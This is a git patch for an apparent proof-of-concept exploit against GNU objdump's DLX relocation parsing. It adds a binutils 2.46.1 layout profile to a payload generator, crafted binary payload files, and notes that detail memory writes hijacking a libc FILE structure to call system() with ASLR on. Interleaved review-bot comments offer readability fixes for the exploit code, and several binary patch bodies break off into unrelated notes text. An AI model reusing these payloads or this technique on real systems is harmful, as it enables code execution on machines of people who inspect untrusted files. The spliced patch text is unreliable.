From 9454cb7b4892c9799b42be4d1a46afcc0e1408d3 Mon Sep 17 00:00:00 2001 
From: ashton <63224111+bikini@users.noreply.github.com> Date: Thu, 25 Jun 2026 06:16:10 -0500 Subject: [PATCH] Update objdump DLX PoC for binutils 2.46.1 --- objdump-dlx-calc-poc/README.md | 24 ++++++++++++- .../docs/aslr-bypass-analysis.md | 18 ++++++++++ .../generate_objdump_dlx_calc_poc.py | 17 +++++++-- ...c_aslr_gnu2461_f05_b6f300000_s7042e500.bin | Bin 0 -> 1280 bytes ...aslr_gnu2461_f05_b6f300000_s7042e500.notes | 34 ++++++++++++++++++ ...c_aslr_gnu2461_f05_b6f300000_s7043e4ff.bin | Bin 0 -> 1280 bytes ...aslr_gnu2461_f05_b6f300000_s7043e4ff.notes | 34 ++++++++++++++++++ ...c_aslr_gnu2461_f05_b702fff00_s7042e500.bin | Bin 0 -> 1280 bytes ...aslr_gnu2461_f05_b702fff00_s7042e500.notes | 34 ++++++++++++++++++ ...c_aslr_gnu2461_f05_b702fff00_s7043e4ff.bin | Bin 0 -> 1280 bytes ...aslr_gnu2461_f05_b702fff00_s7043e4ff.notes | 34 ++++++++++++++++++ ...c_aslr_gnu2461_f06_b6f300000_s7042e500.bin | Bin 0 -> 1280 bytes ...aslr_gnu2461_f06_b6f300000_s7042e500.notes | 34 ++++++++++++++++++ ...c_aslr_gnu2461_f06_b6f300000_s7043e4ff.bin | Bin 0 -> 1280 bytes ...aslr_gnu2461_f06_b6f300000_s7043e4ff.notes | 34 ++++++++++++++++++ ...c_aslr_gnu2461_f06_b702fff00_s7042e500.bin | Bin 0 -> 1280 bytes ...aslr_gnu2461_f06_b702fff00_s7042e500.notes | 34 ++++++++++++++++++ ...c_aslr_gnu2461_f06_b702fff00_s7043e4ff.bin | Bin 0 -> 1280 bytes ...aslr_gnu2461_f06_b702fff00_s7043e4ff.notes | 34 ++++++++++++++++++ ...lc_aslr_orig_f05_bef210000_s7042e500.notes | 1 + ...lc_aslr_orig_f05_bef210000_s7043e4ff.notes | 1 + ...lc_aslr_orig_f05_bf020ff00_s7042e500.notes | 1 + ...lc_aslr_orig_f05_bf020ff00_s7043e4ff.notes | 1 + ...lc_aslr_orig_f06_bef210000_s7042e500.notes | 1 + ...lc_aslr_orig_f06_bef210000_s7043e4ff.notes | 1 + ...lc_aslr_orig_f06_bf020ff00_s7042e500.notes | 1 + ...lc_aslr_orig_f06_bf020ff00_s7043e4ff.notes | 1 + ...aslr_wsl2404_f05_b6f300000_s7042e500.notes | 1 + ...aslr_wsl2404_f05_b6f300000_s7043e4ff.notes | 1 + ...aslr_wsl2404_f05_b702fff00_s7042e500.notes | 1 + 
...aslr_wsl2404_f05_b702fff00_s7043e4ff.notes | 1 + ...aslr_wsl2404_f06_b6f300000_s7042e500.notes | 1 + ...aslr_wsl2404_f06_b6f300000_s7043e4ff.notes | 1 + ...aslr_wsl2404_f06_b702fff00_s7042e500.notes | 1 + ...aslr_wsl2404_f06_b702fff00_s7043e4ff.notes | 1 + 35 files changed, 344 insertions(+), 3 deletions(-) create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s7042e500.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s7042e500.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s7043e4ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s7043e4ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s7042e500.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s7042e500.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s7043e4ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s7043e4ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s7042e500.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s7042e500.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s7043e4ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s7043e4ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s7042e500.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s7042e500.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s7043e4ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s7043e4ff.notes 
diff --git a/objdump-dlx-calc-poc/README.md b/objdump-dlx-calc-poc/README.md index 17874cc..4ba00cf 100644 --- a/objdump-dlx-calc-poc/README.md +++ b/objdump-dlx-calc-poc/README.md @@ -10,6 +10,14 @@ Tested against a binutils-gdb master build from commit: c311f4d37f31ff3fbb5db6923abcdf93bb75a37b ``` +Also validated against the official GNU Binutils 2.46.1 release tarball with a +clean `dlx-elf` objdump build: + +```text +GNU objdump (GNU Binutils) 2.46.1 +elf32-dlx +``` + ## whats in here - `payloads/*.bin` - crafted ELF/DLX object files to feed to `objdump` 
@@ -27,18 +35,32 @@ The payload files are named `.bin` because they are raw binary files, but the fi ASLR stays on. Because of that, one exact payload is not guaranteed to land every time. The files in `payloads/` are a small set of guesses for the address layout seen during testing. -The generator emits the original profile plus a WSL/Ubuntu 24.04 profile measured against the pinned `dlx-elf` build. The second profile keeps ASLR on but uses stable relative offsets observed in the target process: +The generator emits the original profile, a WSL/Ubuntu 24.04 profile measured +against the pinned `dlx-elf` build, and a profile measured against a clean GNU +Binutils 2.46.1 `dlx-elf` build. The profiles keep ASLR on but use stable +relative offsets observed in the target process: ```text layout=wsl2404 off_io=-0x3690 off_sec=0xbb0 rbase=0x220 buf_delta=0x702fff00 or 0x6f300000 system_delta=0x7042e500 or 0x7043e4ff + +layout=gnu2461 off_io=-0x3690 off_sec=0xbb8 rbase=0x190 sec_size_offset=0x40 +buf_delta=0x702fff00 or 0x6f300000 +system_delta=0x7042e500 or 0x7043e4ff ``` That is an ASLR-on relative-delta strategy, not a universal single-shot info-leak bypass. A miss can still happen, so the runner keeps the retry loop. More detail is in `docs/aslr-bypass-analysis.md`. +The `gnu2461` profile was validated with the existing runner: + +```text +HIT try=1 payload=.../payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s7042e500.bin +CALC_HELPER_RAN 2026-06-25T11:14:27Z +``` + So a plain crash like this does not always mean the PoC failed: ```text diff --git a/objdump-dlx-calc-poc/docs/aslr-bypass-analysis.md b/objdump-dlx-calc-poc/docs/aslr-bypass-analysis.md index d3f1690..15df6a9 100644 --- a/objdump-dlx-calc-poc/docs/aslr-bypass-analysis.md +++ b/objdump-dlx-calc-poc/docs/aslr-bypass-analysis.md 
@@ -14,6 +14,8 @@ The current generator emits: - `orig`: the first measured profile. - `wsl2404`: offsets measured against the pinned `dlx-elf` build on WSL/Ubuntu 24.04. +- `gnu2461`: offsets measured against a clean GNU Binutils 2.46.1 `dlx-elf` + objdump build. The `wsl2404` profile uses: @@ -25,6 +27,22 @@ buf_delta=0x702fff00 or 0x6f300000 system_delta=0x7042e500 or 0x7043e4ff ``` +The `gnu2461` profile uses: + +```text +off_io=-0x3690 +off_sec=0xbb8 +sec_size_offset=0x40 +rbase=0x190 +buf_delta=0x702fff00 or 0x6f300000 +system_delta=0x7042e500 or 0x7043e4ff +``` + +The 2.46.1 profile differs because the relocation cache array moved from +`data+0x220` to `data+0x190`, the BFD section object moved from `data+0xbb0` +to `data+0xbb8`, and the `bfd_section.size` field used to widen generic +relocation range checks is at section offset `0x40`. + ## Why argv two-stage is not enough A deterministic leak-then-exploit route would need this sequence in one diff --git a/objdump-dlx-calc-poc/generate_objdump_dlx_calc_poc.py b/objdump-dlx-calc-poc/generate_objdump_dlx_calc_poc.py index bb4e559..faf2348 100644 --- a/objdump-dlx-calc-poc/generate_objdump_dlx_calc_poc.py +++ b/objdump-dlx-calc-poc/generate_objdump_dlx_calc_poc.py @@ -36,6 +36,7 @@ LAYOUTS = ( "name": "orig", "off_io": OFF_IO, "off_sec": OFF_SEC, + "sec_size_offset": 0x38, "rbase": RBASE, "buf_deltas": BUF_TO_FILE_BE32_DELTAS, "wide_deltas": WIDE_TO_FAKE_BE32_DELTAS, @@ -45,11 +46,22 @@ LAYOUTS = ( "name": "wsl2404", "off_io": -0x3690, "off_sec": 0xBB0, + "sec_size_offset": 0x38, "rbase": 0x220, "buf_deltas": (0x702FFF00, 0x6F300000), "wide_deltas": WIDE_TO_FAKE_BE32_DELTAS, "system_deltas": STDERR_TO_SYSTEM_BE32_DELTAS, }, + { + "name": "gnu2461", + "off_io": -0x3690, + "off_sec": 0xBB8, + "sec_size_offset": 0x40, + "rbase": 0x190, + "buf_deltas": (0x702FFF00, 0x6F300000), + "wide_deltas": WIDE_TO_FAKE_BE32_DELTAS, + "system_deltas": STDERR_TO_SYSTEM_BE32_DELTAS, + }, ) 
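Review bot: The new `sec_size_offset` values are bare hex literals, unlike the neighbouring `off_io`/`off_sec`/`rbase` fields of the `orig` entry, which use the module constants `OFF_IO`, `OFF_SEC` and `RBASE`; the `0x38` literal is now repeated in both the `orig` and `wsl2404` entries and nothing in the code says what it denotes. Hoisting it beside the existing constants, e.g. `SEC_SIZE_OFFSET = 0x38  # offset of the section size field inside the BFD section object (see docs/aslr-bypass-analysis.md)`, and using it in both entries would keep the table self-describing and leave the `gnu2461` entry's `0x40` as the one visible deviation. The same applies to the `@@ -36,6` hunk above, which adds the key to the `orig` entry. The `gnu2461` entry also repeats `off_io`, `buf_deltas`, `wide_deltas` and `system_deltas` from `wsl2404` verbatim; if these are genuinely shared measurements rather than coincidentally equal, deriving the entry from the `wsl2404` dict with only the three differing fields overridden would make the actual 2.46.1 difference explicit. The start of the `LAYOUTS` tuple lies outside these hunks.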
@@ -85,8 +97,8 @@ def build(out_dir): file_system_slot = off_io + 0x68 file_wide_data = off_io + 0xA0 file_vtable = off_io + 0xD8 - section_size_low = off_sec + 0x38 - section_size_high = off_sec + 0x3C + section_size_low = off_sec + layout["sec_size_offset"] + section_size_high = section_size_low + 4 for flag_byte4 in (0x05, 0x06): for buf_delta in layout["buf_deltas"]: @@ -131,6 +143,7 @@ def build(out_dir): f"system_delta=0x{system_delta:08x}", "command=P", f"off_io={off_io:#x} off_sec={off_sec:#x} rbase={rbase:#x}", + f"sec_size_offset={layout['sec_size_offset']:#x}", "", ] + [ 
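Review bot: `section_size_high = section_size_low + 4` drops the information the old `0x38`/`0x3C` pair carried implicitly, namely that the size field is handled as two 4-byte halves with the high half placed 4 bytes above the low one; a reader of the new line has to already know that to trust the `+ 4`. A short comment on the changed pair would keep it readable, e.g. `# the size field is written as two 4-byte halves: low dword at sec_size_offset, high dword 4 bytes above it`. The companion `@@ -131,6` hunk below records `sec_size_offset` in the `.notes` header on its own line while `off_io`/`off_sec`/`rbase` share one line; if anything parses those headers, the two formats should be checked for consistency. The body of `build` continues before and after this hunk.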
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s7042e500.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s7042e500.bin new file mode 100644 index 0000000000000000000000000000000000000000..5005c15ed2b8541fe0d7671fcc87fed7ba23db9b GIT binary patch literal 1280 zcmd5*T}vB56g`_=jnP`IvC*_bA6jTZNS#eIN|csLTR}m=2f;oRrO_7DgiM4M1^l^a{=cNzto7ANjx^ASL)0=of5p3H}2f z5bdYHpx^}XQ2y=|7_!NafML;(fk&b@fDzG~Kw9)GV3hjrVc;=!rvzlEJM+Mp=u5zO zB4}MU?BJ6SdE_0z&0@a`PvSpCy9Lklh|WmB9p-VKMB~MItln?<2Ms^(jaJN`HvAdG zpEc_2SJ(N^jQVq<{<1PfrE~vD!~fdw=d16o4zTzg)fiy^h?M^7i5G=Who)736B=y)LeQ?AN!pk<;~BfM3HbyyJa9W=vM} z&gJFHOhpmpNec0KoF(TQX-8B`Q{nvMZCJS^%94HjJ`?-6WG;k FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x7042e500 FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE 
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s7043e4ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s7043e4ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..86172e9b10dbe38696401eeb53284edd892eeb3d GIT binary patch literal 1280 zcmd5*%}QHA7(F-lYK-+iRjU5W zcW|jbfuPGS`UVOLx97V*$;~Xpr60_k@0{;sX71#hU*DGIt%QY2SnI!;#{~PIU(5OP zS0qti@xH6Xx(DnOkNyBSDbKqp0d?ewNuXYE3P_562sDs?cmz^{Pe7yKGl$>{&_uL9 z1I>bcK#TnD0%*0#&ww`3&w+N)?|=@`?}4=F55Pz2w{1Wtb!QUjqV7xq-J*X7J|%*y z>j`hLH$-mvN^r5*|H7U4QM6m|Jdfyf1l(aB=SkcRUdHN;hQHbH^W1oj`O}8K%kcLY zb>3Ia{{2RMz^H#IjZmqcf5`9;8~*I!+~4^3Lr%)&Fi1*FGhMDJW) zzVuWSQJ$m_@5ga+zL82qwKNs>KW4+qHBpAF FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x7043e4ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE 
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s7042e500.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s7042e500.bin new file mode 100644 index 0000000000000000000000000000000000000000..6e0000d69bd9996bb547d4f3bc6916d4a7988e41 GIT binary patch literal 1280 zcmd5*+e%wO6kR9hXcBGICiU8a4+<>^N$12{QK?vL1qB5k1brxmrWa^Ua3Zu=@E80E zpQQiL$F^S}m{-9+s1V_F?Q_e?JQN?@FlX(x_Ht(2*>keG@!CpRh{M`FW1bM~Yri(_ zf1e?Z?$~>;66+GMv%Go}aI&8Fy9RWTrxt*2!9^e~dL77+_x=U4f;T{qV2exe7I;9k z9|JkTCqSS4-6_y-lOF>EqJIY-ihcp)MZW|JqBns@)c*_sgVdb`V2HZ22n>t928^VF z){TZ891D?0{wKIu;&m|8veE%uKUo!mV`pQ+(KWF&a?~e0dZu;BD`@b^$Zw&uBx%4&a z=O%NBh;Iip<~to+KZjP(E_4}s8hQqL7J3eP9{L4KQf6Jzpy*JvD0&o4iY`T)qR*wz zm3`=Q>2vx1ijC^m28!>hm7@=DKOMZUp?FyR+`;v?FOB^Qin?(a;Kwiv?|2uG8Iu*g zb9wnPQ&B{DnnH3O=gIj-;)rSmDx7~Thm~JMS+bAcXJUp+=0bQF7WcA#l5}x#)P29q e=2XZD68089dwv>xqI1hqZ0q(p^QATq?*0#}!G9b8 literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s7042e500.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s7042e500.notes new file mode 100644 index 0000000..8fadcf1 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s7042e500.notes 
@@ -0,0 +1,34 @@ +layout=gnu2461 +flag_byte4=0x05 +buf_delta=0x702fff00 +wide_delta=0x4fff0000 +system_delta=0x7042e500 +command=P +off_io=-0x3690 off_sec=0xbb8 rbase=0x190 +sec_size_offset=0x40 + +000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8 +007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8 +008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc +009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc +010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x7042e500 FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE 
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s7043e4ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s7043e4ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..d85b8578430757f06f24aee225ef20aa359d89f8 GIT binary patch literal 1280 zcmd5*%Su~O6kRv>#uy*Ia4xcjka$#+`ZKnZ(}! zBdMTu`LKhdA@az-7>gzT7oNnAqTGV#c|>P0;12yH&!9PWnaFn;`d&lNd*d#l&l&n* zL!USD>{r|QFOB>wBR^i7lIzCzpEUGShQ3%^{+;~3vY}_c+s7)JqV%lB7kRKGP)*sgAU-QC##vU7w&y?W5b_3>e2a|;FCs0X+gdf^@a1!Tr# zMekf*zRXl)k)L58Igb@`zLD6XT#gaWKbFGGPogZTQIYG>R&+W7C23vG)QId~w`-1+$BMfB8vp FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x7043e4ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE 
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s7042e500.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s7042e500.bin new file mode 100644 index 0000000000000000000000000000000000000000..5005c15ed2b8541fe0d7671fcc87fed7ba23db9b GIT binary patch literal 1280 zcmd5*T}vB56g`_=jnP`IvC*_bA6jTZNS#eIN|csLTR}m=2f;oRrO_7DgiM4M1^l^a{=cNzto7ANjx^ASL)0=of5p3H}2f z5bdYHpx^}XQ2y=|7_!NafML;(fk&b@fDzG~Kw9)GV3hjrVc;=!rvzlEJM+Mp=u5zO zB4}MU?BJ6SdE_0z&0@a`PvSpCy9Lklh|WmB9p-VKMB~MItln?<2Ms^(jaJN`HvAdG zpEc_2SJ(N^jQVq<{<1PfrE~vD!~fdw=d16o4zTzg)fiy^h?M^7i5G=Who)736B=y)LeQ?AN!pk<;~BfM3HbyyJa9W=vM} z&gJFHOhpmpNec0KoF(TQX-8B`Q{nvMZCJS^%94HjJ`?-6WG;k FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x7042e500 FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE 
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s7043e4ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s7043e4ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..86172e9b10dbe38696401eeb53284edd892eeb3d GIT binary patch literal 1280 zcmd5*%}QHA7(F-lYK-+iRjU5W zcW|jbfuPGS`UVOLx97V*$;~Xpr60_k@0{;sX71#hU*DGIt%QY2SnI!;#{~PIU(5OP zS0qti@xH6Xx(DnOkNyBSDbKqp0d?ewNuXYE3P_562sDs?cmz^{Pe7yKGl$>{&_uL9 z1I>bcK#TnD0%*0#&ww`3&w+N)?|=@`?}4=F55Pz2w{1Wtb!QUjqV7xq-J*X7J|%*y z>j`hLH$-mvN^r5*|H7U4QM6m|Jdfyf1l(aB=SkcRUdHN;hQHbH^W1oj`O}8K%kcLY zb>3Ia{{2RMz^H#IjZmqcf5`9;8~*I!+~4^3Lr%)&Fi1*FGhMDJW) zzVuWSQJ$m_@5ga+zL82qwKNs>KW4+qHBpAF FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x7043e4ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE 
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s7042e500.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s7042e500.bin new file mode 100644 index 0000000000000000000000000000000000000000..6e0000d69bd9996bb547d4f3bc6916d4a7988e41 GIT binary patch literal 1280 zcmd5*+e%wO6kR9hXcBGICiU8a4+<>^N$12{QK?vL1qB5k1brxmrWa^Ua3Zu=@E80E zpQQiL$F^S}m{-9+s1V_F?Q_e?JQN?@FlX(x_Ht(2*>keG@!CpRh{M`FW1bM~Yri(_ zf1e?Z?$~>;66+GMv%Go}aI&8Fy9RWTrxt*2!9^e~dL77+_x=U4f;T{qV2exe7I;9k z9|JkTCqSS4-6_y-lOF>EqJIY-ihcp)MZW|JqBns@)c*_sgVdb`V2HZ22n>t928^VF z){TZ891D?0{wKIu;&m|8veE%uKUo!mV`pQ+(KWF&a?~e0dZu;BD`@b^$Zw&uBx%4&a z=O%NBh;Iip<~to+KZjP(E_4}s8hQqL7J3eP9{L4KQf6Jzpy*JvD0&o4iY`T)qR*wz zm3`=Q>2vx1ijC^m28!>hm7@=DKOMZUp?FyR+`;v?FOB^Qin?(a;Kwiv?|2uG8Iu*g zb9wnPQ&B{DnnH3O=gIj-;)rSmDx7~Thm~JMS+bAcXJUp+=0bQF7WcA#l5}x#)P29q e=2XZD68089dwv>xqI1hqZ0q(p^QATq?*0#}!G9b8 literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s7042e500.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s7042e500.notes new file mode 100644 index 0000000..16e95a3 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s7042e500.notes 
@@ -0,0 +1,34 @@ +layout=gnu2461 +flag_byte4=0x06 +buf_delta=0x702fff00 +wide_delta=0x4fff0000 +system_delta=0x7042e500 +command=P +off_io=-0x3690 off_sec=0xbb8 rbase=0x190 +sec_size_offset=0x40 + +000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8 +007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8 +008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc +009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc +010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x7042e500 FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE 
